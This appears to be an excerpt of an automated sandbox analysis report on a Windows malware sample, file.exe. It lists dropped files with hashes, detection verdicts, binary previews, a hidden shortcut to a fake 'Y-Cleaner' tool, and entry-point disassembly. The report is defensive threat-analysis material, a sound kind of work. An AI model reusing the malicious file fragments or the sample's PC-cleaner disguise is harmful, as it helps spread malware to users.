                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.4.2.1.7.7.4.2.7.4.1.0.9.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.4.2.1.7.7.4.7.7.4.1.1.3.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.3.d.4.4.6.9.3.-.5.6.4.a.-.4.a.a.c.-.9.3.8.0.-.f.7.4.8.f.b.d.7.4.7.a.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.f.d.1.4.8.3.a.-.5.c.0.a.-.4.4.3.2.-.9.a.9.3.-.3.1.0.f.f.7.c.6.4.3.9.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.6.4.-.0.0.0.1.-.0.0.1.4.-.e.1.9.f.-.6.9.3.d.e.1.4.2.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.c.8.4.4.5.7.b.c.a.7.d.b.8.3.6.4.1.f.d.5.6.9.2.5.c.6.4.9.6.b.4.c.9.a.8.c.6.c.5.b.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Sat Nov 30 06:29:34 2024, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):48616
                                                      Entropy (8bit):2.6184731632176237
                                                      Encrypted:false
                                                      SSDEEP:384:G9uwlZHjXKPGiwyro01nPrRfVP0hGL5tkJp:GkwlJjXKPGjJUNN8MDQ
                                                      MD5:6F5818E9C4AA5A65C509832B3EB4F2CE
                                                      SHA1:D670EF5B0BAEF399F0F52834D2C67AE37C725853
                                                      SHA-256:D1C26B09A13E4F10511BF1ED277E69BAF96EC49FAE10A5D9CE8CC505AE1F7FFA
                                                      SHA-512:097BFFA6D9A035A29AF5BFB0089854DE1D18150976822059B9C4F0588A3E737ECD4BAF33D4E8D2258F1D5EE637FC55A6660B0EDC13D3F77EDF02BCD29A9A7222
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:MDMP..a..... ........Jg............4...........8...<............,..........T.......8...........T............B...{..........t...........` ..............................................................................eJ....... ......GenuineIntel............T.......d.....Jg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8300
                                                      Entropy (8bit):3.694146224421122
                                                      Encrypted:false
                                                      SSDEEP:192:R6l7wVeJJCG6wT6YNESU9AgmfBkqlpDM89bHfxsfSlPm:R6lXJl606Y+SU9Agmf7JHfqf2u
                                                      MD5:31F0BEB9BC150E2DBBA0E2407C47A626
                                                      SHA1:687CC16AD05D1AAE5D059959545FBAAC1BF17FC9
                                                      SHA-256:018E85057D96617AB061C588D18761FBF5C80FCD2BD440A8A93E4DE830A4613B
                                                      SHA-512:8941709B3CD1EC17568DE72699BB17B47A62EB5894BC3410A6F6485F110AC8BBC2D6F32655A160C658C654113CD4EDF87F8C4EC2BA923F53D01F72B2C9BDC715
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.7.0.8.<./.P.i.
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4537
                                                      Entropy (8bit):4.430791805548518
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwWl8zsZ7uJg77aI9YzWpW8VYXYm8M4JJlRFB+q8xg1b0F4tsd:uIjfOI7uC7VDJzFYub0Fqsd
                                                      MD5:CE372543EFFC192E6C4549957800FF5C
                                                      SHA1:D5A1CFEEE2B96640BC120871F48DBD411D9E6DAE
                                                      SHA-256:F8F29575547E957D597F1A461EEB52016E04A61F6CD8E66B2279579C313ADA65
                                                      SHA-512:5EB67DFEF60E1234E9144C958DCE8DBA86A3C3615C8E90C5E833DF6396AA176CD6315B89F8933154336FE8237B64BC23A7837802E81488F5CF1CA3177C19EF11
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="610412" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:V:V
                                                      MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                      SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                      SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                      SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:0
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:V:V
                                                      MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                      SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                      SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                      SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:0
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):242176
                                                      Entropy (8bit):6.47050397947197
                                                      Encrypted:false
                                                      SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                      MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                      SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                      SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                      SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Joe Sandbox View:
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      • Filename: file.exe, Detection: malicious, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:V:V
                                                      MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                      SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                      SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                      SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                      Malicious:false
                                                      Preview:0
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):97296
                                                      Entropy (8bit):7.9982317718947025
                                                      Encrypted:true
                                                      SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                                      MD5:E6743949BBF24B39B25399CD7C5D3A2E
                                                      SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                                      SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                                      SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                                      Malicious:false
                                                      Preview:XM .4Ih..]...t.&.s...v.0{.v.vs'...:.l.h...e.....R....1...r.R+Fk*....~.s.....Q.....r.T.b.....~c..[........;...j.@.0.%.....x...v.w.....<ru....Yre;.b6...HQ-...8.B..Q.a...R.:.h&r.......=.;r.k..T.@....l..;#..3!.O..x.}........y'<.GfQ.K.#.L5v..].......d....N{e..@................A\..<.t.u.X.O.n..Z.. .Xb.O<.*Z...h~.(.W.f.z.V.4..L...%5.0...H..`s...y.B......(IL5s:aS}X.......M9.J.o....).'..M;n6]...W..n....)...L...._..e.....>....[....RA.........'...6.N..g6....IY.%h.. 3r....^..\.b~y./....h.2......ZLk....u}..V..<.fbD.<!.._2.zo..IE...P..*O...u......P.......w#.6N..&l.R}GI...LY...N.yz..j..Hy.'..._.5..Pd9.y..+....6.q*...).G.c...L#....5\.M....5U])....U(..~H.m....Y....G1.r.4.B..h........P..]i...M%.............)q......]....~|..j...b..K!..N.7R.}T.2bsq..1...L^..!.|q.D'...s.Ln...D@..bn%0=b.Q1.....+l...QXO|.......NC.d......{.0....8F.....<.W.y..{o..j.3.....n..4.....eS]. K...o.B.H~.sh.1....m8....6{.ls..R..q..~....w._;....X*.#..U....6n.ODbT.+Zc....q....S.$-S`YT....
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):21
                                                      Entropy (8bit):3.880179922675737
                                                      Encrypted:false
                                                      SSDEEP:3:gFsR0GOWW:gyRhI
                                                      MD5:408E94319D97609B8E768415873D5A14
                                                      SHA1:E1F56DE347505607893A0A1442B6F3659BEF79C4
                                                      SHA-256:E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
                                                      SHA-512:994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
                                                      Malicious:false
                                                      Preview:9tKiK3bsYm4fMuK47Pk3s
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1502720
                                                      Entropy (8bit):7.646111739368707
                                                      Encrypted:false
                                                      SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                      MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                      SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                      SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                      SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 75%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):242176
                                                      Entropy (8bit):6.47050397947197
                                                      Encrypted:false
                                                      SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                      MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                      SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                      SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                      SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):1502720
                                                      Entropy (8bit):7.646111739368707
                                                      Encrypted:false
                                                      SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                      MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                      SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                      SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                      SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 75%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Sat Nov 30 05:29:33 2024, mtime=Sat Nov 30 05:29:33 2024, atime=Sat Nov 30 05:29:33 2024, length=1502720, window=hide
                                                      Category:modified
                                                      Size (bytes):2117
                                                      Entropy (8bit):3.8746839201423637
                                                      Encrypted:false
                                                      SSDEEP:48:80lI2oCRLwCM2jO2vNkCM6uCMAZFuCMzDmyg:8woqcCfNpPD5Ddy
                                                      MD5:51E7FD945AACF8E40B61A4497E219361
                                                      SHA1:21DC5032A3BD8DFCD1DE832D7B44561D6C10A7D4
                                                      SHA-256:E459916436D315768223AC725ABF315007B2EAFF9EE5B25FDEFB6D244771617E
                                                      SHA-512:899765B50EBE75415F100D4161AD261ED33DE1D04C72B6A671A59F41FC0CC0DC0C4A6BA01EB070DD8C212B46C03EBCBC0DF4200F63554406707F3D600DD3AEEC
                                                      Malicious:false
                                                      Preview:L..................F.@.. .....G8.B....G8.B....G8.B..........................".:..DG..Yr?.D..U..k0.&...&......Qg.*_...p.S9.B...,N8.B......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=~Yd$..........................3*N.A.p.p.D.a.t.a...B.P.1.....~Yb$..Local.<......EW.=~Yd$..........................H.R.L.o.c.a.l.....N.1.....~Yd$..Temp..:......EW.=~Yd$............................:.T.e.m.p.....^.1.....~Y.3..23RE4W~1..F......~Y.3~Y.3..............................2.3.R.E.4.w.3.2.f.N.....h.2.....~Y.3 .Y-CLEA~1.EXE..L......~Y.3~Y.3..........................i.8.Y.-.C.l.e.a.n.e.r...e.x.e.......m...............-.......l.............J(.....C:\Users\user\AppData\Local\Temp\23RE4w32fN\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.......\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.2.3.R.E.4.w.3.2.f.N.\.Y.-.C.l.e.a.n.e.r...e.x.e.=.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.2.3.R.E.4.w.3.2.f.N.\.Y.-.C.l.e.a.n.e.r...e.x.e.........%
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:MS Windows registry file, NT/2000 or above
                                                      Category:dropped
                                                      Size (bytes):1835008
                                                      Entropy (8bit):4.4165199239407595
                                                      Encrypted:false
                                                      SSDEEP:6144:ecifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuN85+:ri58oSWIZBk2MM6AFBqo
                                                      MD5:2DB092F1AAB8048F0FBD52466221EA55
                                                      SHA1:08DFFFC65DD0F1C535CD68C36D1B6A176D5AD8F0
                                                      SHA-256:43F2CFD9D3E9301B301B1B63C339E67F74FBD886466514850C2427464336134A
                                                      SHA-512:C9B49AE6074CFA63E6B9F178C85C1E260E56F62E6DF86D1593DCD4D4D5AA307D5BCA7E7CD1C4EB6313FB365F260AF7380D3FDEF0AD60215F82C30B0CAB3792B4
                                                      Malicious:false
                                                      Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmN..8.B...............................................................................................................................................................................................................................................................................................................................................4..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):7.945629540965111
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:file.exe
                                                      File size:1'995'776 bytes
                                                      MD5:9d2eed099096486e2ae388b2b220497c
                                                      SHA1:c84457bca7db83641fd56925c6496b4c9a8c6c5b
                                                      SHA256:5d5a9d7c44e0dbd125b577319dcad5274121c38b6cde03658eb83c49e316d307
                                                      SHA512:c289c2e38dc49ef5495baf8873f02866c53ce398f991a246148b29db81870e41dba5353691d9b73b071720ad98dfca438b5f5143eb65979e25220971c167dd35
                                                      SSDEEP:49152:HsIyUDKJqCHxqbO9Nyhm5T0AHFJRGUpaJr8faE+A3EpEVt:H1vD8xquFxFH2rKavGEpE
                                                      TLSH:D5953317BD879302D8B01F7B361317D91E98BB7299BB010EAE6849F84B415D48F532EA
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........RC..<...<...<.......<.......<.......<..~G...<...=.3.<.......<.......<.......<.Rich..<.........PE..L....[.d.................|.
                                                      Icon Hash:cfa99b8a8651798d
                                                      Entrypoint:0x8a7000
                                                      Entrypoint Section:.taggant
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x64C65B18 [Sun Jul 30 12:44:08 2023 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:0
                                                      File Version Major:5
                                                      File Version Minor:0
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:0
                                                      Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                      Instruction
                                                      jmp 00007FCBA4C730BAh
                                                      rsqrtps xmm3, dqword ptr [esi]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add cl, ch
                                                      add byte ptr [eax], ah
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [esi], al
                                                      add al, 00h
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [ecx], al
                                                      add byte ptr [eax], 00000000h
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add dword ptr [eax+00000000h], 00000000h
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [edi], bh
                                                      add eax, dword ptr [eax]
                                                      add byte ptr [eax+eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add dword ptr [eax+00000000h], eax
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      jnle 00007FCBA4C73032h
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      Programming Language:
                                                      • [C++] VS2008 build 21022
                                                      • [ASM] VS2008 build 21022
                                                      • [ C ] VS2008 build 21022
                                                      • [IMP] VS2005 build 50727
                                                      • [RES] VS2008 build 21022
                                                      • [LNK] VS2008 build 21022
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x6f05b0x6f.idata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x660000x8234.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
